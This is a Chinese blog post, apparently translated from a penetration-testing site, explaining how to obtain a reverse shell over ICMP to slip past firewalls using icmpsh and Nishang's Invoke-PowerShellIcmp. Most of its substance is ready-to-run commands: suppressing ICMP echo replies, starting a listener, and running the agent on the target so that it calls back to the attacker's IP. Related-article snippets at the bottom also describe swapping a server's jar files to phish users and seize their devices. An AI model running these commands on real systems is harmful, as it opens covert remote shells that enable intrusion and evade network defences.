通过ICMP协议反弹SHELL并执行命令

最新推荐文章于 2024-07-02 15:08:13 发布
最新推荐文章于 2024-07-02 15:08:13 发布
阅读量3.6k 收藏 6
点赞数 2

前言

内网中的大多数系统都位于防火墙和企业代理之后,以便控制入口以及出口流量。防火墙可以拦截到反连的shell,但ICMP协议基本上是不拦截的。因此,为了获得shell并在目标主机上执行命令,可以使用ICMP协议作为隐藏通道进行连接。
使用icmpsh(https://github.com/inquisb/icmpsh)工具可用来执行此攻击。推特上的大牛@Bernardo Damele已经将其导入到他的工具sqlmap中,可以使用-os-pwn选项来发起攻击。

以下命令将禁止ICMP回显,这对于工具正常使用是至关重要的,启动一个监听器,该监听器将等待目标主机的ICMP数据包:

sysctl -w net.ipv4.icmp_echo_ignore_all=1
./icmpsh_m.py 192.168.100.3 192.168.100.4


icmpsh工具中还包含需要在目标主机上传输和执行的二进制文件。以下命令将向监听主机发送ICMP包:

icmpsh.exe -t 192.168.100.3


一个shell将通过ICMP接收,并且也可以通过这个管道来执行命令。

Daniel Compton(https://twitter.com/commonexploits)开发了一个自动化过程的脚本。此脚本所需的唯一输入是目标主机的IP地址。该脚本包含在icmpsh(https://github.com/inquisb/icmpsh)中。


工具有多个选项命令和控制。


在Nishang框架中包含一个PowerShell模块,可以与icmpsh python脚本结合使用,以获取ICMP上的shell。在主机上,执行下面命令将会开始监听ICMP数据包。

./icmpsh_m.py 192.168.100.3 192.168.100.4
在目标主机上, PowerShell的Icmp 模块仅需要主IP地址: 
Import-Module .\Invoke-PowerShellIcmp.ps1
Invoke-PowerShellIcmp 192.168.100.3

这个链接将会返回给主机一个shell


Resources

https://attack.mitre.org/wiki/Command_and_Control
http://bernardodamele.blogspot.co.uk/2011/04/reverse-connection-icmp-shell.html
https://github.com/inquisb/icmpsh
https://github.com/samratashok/nishang
http://leidecker.info/downloads/index.shtml
https://github.com/nocow4bob/PiX-C2
https://github.com/sincoder/icmp_shell
https://github.com/Darkpaw95/ICMP_Rev_shell

原文:https://pentestlab.blog/2017/07/28/command-and-control-icmp/


FLy_鹏程万里
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
利用ICMP协议反弹shell
不忘初心,护天下安全!
07-20 1074
网络管理员通常使用各种各样的防火墙,以拦截各类渗透测试动作,如某防火墙允许已知的机器流量在端口和服务(入口过滤),并拥有强大的出口访问控制列表的设置。然而很多时候,为了方便运维管理,在各种安全策略中,ICMP协议通常是不会过滤的,通俗点说就是不会禁PING。ICMP(InternetControlMessageProtocol)Internet控制报文协议,是TCP/IP协议簇的一个子协议,用于在IP主机、路由器之间传递控制消息。...
icmp-remote-shell:使用ICMP协议进行数据隐藏的隐写术远程Shell的原型
05-14
ICMP远程外壳 使用ICMP协议进行数据隐藏的隐写术远程Shell的原型。 要安装数据包,请使用pip: pip install icmp_remote_shell Packet提供了一些可以在您的ICMP隐写术项目中使用的常用功能: 校验和-计算数据包校验...
icmp反弹shell 简介
whatday的专栏
04-09 982
目录 第一节 轶事 第二节 技术原理 第三节 ICMP反弹shell 第一节 轶事 首次听说icmp隧道,要从免费上网说起。当年的网费还是挺贵的,大学生上个网还是容易“破产”呀。当你的网费耗尽后,网管服务器就会拦截你的网络请求,但是只拦截了TCP和UDP协议,放过了ICMP协议,ping ip还是可以的,于是就开始琢磨利用icmp隧道将访问转发到自己的一台放置在公网中的代理,利用代...
获取目标机器的ssh反弹权限后,如何通过一台公网服务器的服务 jar 包进行偷梁换柱植入目录进行钓鱼,从而获取目标使用人的终端设备权限和个人信息?
最新发布
代码讲故事
07-02 287
网络攻防实战中获取目标机器的ssh反弹权限后,如何通过一台公网服务器的服务 jar 包进行偷梁换柱植入目录进行钓鱼,从而获取目标使用人的终端设备权限和个人信息?
内网渗透之 ICMP(icmpsh) 协议反弹Shell
The current road is different, love needs to distinguish between right and wrong
04-09 5075
简介 最常见的ICMP消息为Ping命令的回复,通过ping命令访问远程计算机,尝试进行ICMP隧道,将TCP/UDP数据封装到ICMP的ping数据包中,从而穿过防火墙(通常防火墙不会屏蔽ping数据包)。 常见的ICMP隧道工具有:icmpsh、PingTunnel、icmptunnel、powershell icmp等。 这里使用 icmpsh跨平台工具,python版本 < python3。 实验环境 kali:192.168.95.128 windows7:192.168.9
利用icmpsh建立icmp隧道反弹shell
huayimy的博客
12-29 783
利用icmpsh建立icmp隧道反弹shell,安装pip2,安装impacket模块,raise ReadTimeoutError,Failed to build future
内网隧道代理技术(二十五)之 ICMP隧道反弹SHELL
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
09-14 304
由于ICMP报文自身可以携带数据,而且ICMP报文是由系统内核处理的,不占用任何端口,因此具有很高的隐蔽性。把数据隐藏在ICMP数据包包头的data字段中,建立隐蔽通道,可以实现绕过防火墙和入侵检测系统的阻拦。
域渗透(二)-内网隧道与端口转发技术
黑白的博客
05-01 6292
对于我们的环境而言,kali是桥接,首先只能访问桥接的win2016和centos7-2,所以我们跟kali通信的大多是使用win2016的,这里毕竟是模拟环境,我们就会假设win2016这台windows已经被拿下了,所以很多木马都是直接放到win2016上的,这些操作跟域相关的知识关系还不是很大,基本都是拿下第一台服务器后的一些操作,所以用到kali和win2016比较多,我们的环境是建立在vmware的三种网络模式上,去模拟各种环境。
HC110110004 ICMP协议
01-05
Ping是使用ICMP Echo Request报文来查询某些信息,并通过ICMP Echo Reply报文来响应,进行差错检测。Tracert是使用ICMP Echo Request报文来跟踪数据包的传输路径,了解网络拓扑结构。 ICMP报文类型有很多种,每种...
ICMP协议pcap数据包下载;ICMP协议报文解析
03-24
ICMP协议pcap数据包下载,支持抓包软件(如:wireshark)打开并学习ICMP协议报文解析。需要其他协议,请查看我发布的其他资源。
ICMP协议 作者文章电子版 需要的下载
06-03
总的来说,ICMP协议是网络诊断和故障排除的重要工具,它通过向网络发送特定类型的报文并接收响应,帮助网络管理员理解网络状态,定位和解决网络问题。同时,ICMP也是IP协议栈不可或缺的一部分,为网络通信提供了必要...
winexec函数 执行powershell 脚本_powershell搭建icmp隧道
weixin_39655160的博客
12-05 258
说明与其说是powershell搭建icmp隧道,不如说是icmpsh+powershell搭建的。icmpsh的使用可以参考上上篇的文章,它是在攻击机执行icmpsh_m.py文件,然后在受害机执行的icmpsh.exe。现在针对powershell的方法,就是把icmpsh.exe换成powershell脚本。攻击机还是运行icmpsh_m.py。像之前的icmpsh.exe是只能...
icmp协议_利用ICMP(icmpsh)协议反弹Shell 渗透红队笔记
weixin_39872257的博客
12-01 353
渗透攻击红队一个专注于红队攻击的公众号大家好,这里是渗透攻击红队的第 十篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),每周一更。ICMP隧道‍ICMP隧道是一个比较特殊的协议。在一般的通信协议里,如果两台设备要进行通信,肯定要开放端口,而在ICMP协议下就不需要。最常见的ICMP消息为Ping命令的回复,攻击者可以利用命令得到比回复更多的ICMP请求。在通常情况下...
icmpsh解决运行报错
weixin_30655219的博客
11-22 550
运行./run.sh报错 sysctl -w net.ipv4.icmp_echo_ignore_all=1 >/dev/null python icmpsh_m.py 攻击机ip 目标机ip 目标机运行:icmpsh.exe -t 攻击机ip -d 500 -b 30 -s 128 转载于:https://www.cnblogs.com/websecyw/p/10001...
ICMPSH的学习ICMP反弹shell
来到了学渣的博客
06-04 1389
ICMP隧道 最常见的ping命令就是利用的ICMP协议,使用该协议反弹shell,两台机器不需要开放端口,ICMP隧道简单好用。 实验环境 Kali 192.168.10.144 win7 192.168.10.129 kali安装好icmpsh工具 root@kali:~# git clone https://github.com/inquisb/icmpsh.git 安装icmpsh的依赖包 root@kali:~# apt-get install python-impacket 执行之前最重要
nishangICMP反弹shell攻击日志分析
weixin_44253823的博客
11-08 673
ICMP包一般不被防火墙拦截,使用ICMP协议作为连接容易通过防火墙。 攻击过程复现。 复现环境 win7:192.168.0.73。powershell导入nishang框架。https://blog.csdn.net/weixin_44253823/article/details/102972355 kali:192.168.0.162。安装icmpsh工具。 https://gi...
隐藏通信隧道技术之icmpsh反弹shell(网络层ICMP隧道)
bring_coco的博客
01-05 798
优势:不需要开放端口就能通信 常见ICMP的消息是ping命令,通过ping可以得到一些回复 如果HTTP,DNS正反向端口转发不行时候可以尝试ICMP隧道 建立基础:只要能ping通,可以将TCP/UDP数据封装到数据包中,然后利用ping的数据包来穿透防火墙。 实验环境: 1.虚拟机中进行 (kali作为外网机器,monowall1是分隔内外网的防火墙,win7,win2012是两台内网机器) 2.kali的ip:10.0.78.29 Monowall1的ip:1.1.1.1 Win7的ip:1.1.
ICMP协议详解:ping与tracert命令的机制分析
ICMP协议在确保网络通信的正常运行和诊断网络问题中发挥着至关重要的作用。通过ping和tracert这样的工具,我们可以有效地监控网络状态,定位问题,并进行相应的故障排除。同时,学习和理解ICMP的工作原理对于网络...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值